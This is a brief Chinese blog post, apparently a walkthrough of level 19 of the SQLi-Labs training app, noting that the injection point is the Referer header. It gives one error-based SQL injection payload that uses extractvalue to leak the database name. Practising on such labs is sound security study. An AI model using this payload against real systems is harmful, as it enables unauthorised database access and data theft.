SQLI DUMB SERIES-19

(1)根据题意,从Referer入手

(2)报错注入与上一关相同。如爆库名:

'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

 

posted @ 2019-04-14 17:10  南有乔木1234  阅读(...)  评论(...编辑  收藏